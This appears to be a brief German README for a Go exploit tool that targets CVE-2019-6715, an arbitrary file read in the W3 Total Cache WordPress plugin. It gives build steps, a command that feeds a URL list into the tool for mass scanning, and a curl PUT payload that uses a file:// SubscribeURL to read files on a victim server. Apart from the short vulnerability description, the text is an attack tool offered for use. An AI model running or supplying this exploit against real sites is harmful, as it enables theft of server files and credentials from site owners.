
go get github.com/fatih/color
go build
cat list.txt | ./2019-6715
Alle verwundbaren URLs werden in text.log protokolliert.
Beschreibung: pub/sns.php im W3 Total Cache Plugin vor 0.9.4 für WordPress erlaubt es entfernten Angreifern, beliebige Dateien über das SubscribeURL-Feld in den SubscriptionConfirmation-JSON-Daten zu lesen.
Schwachstellentyp: Beliebiges Lesen von Dateien
Produkthersteller: Wordpress W3 Total Cache Plugin von Frederick Townes
Betroffene Produktcodebasis: W3 Total Cache - 0.9.2.6 - 0.9.3, behoben in 0.9.4
Betroffene Komponente: Betroffene Quellcodedatei: w3-total-cache/pub/sns.php
curl -X PUT --data '{"Type":"SubscriptionConfirmation","Message":"","SubscribeURL":"file://file_path"}' -H 'User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/71.0.3578.80 Safari/537.36' http://victim.com/wp-content/plugins/w3-total-cache/pub/sns.php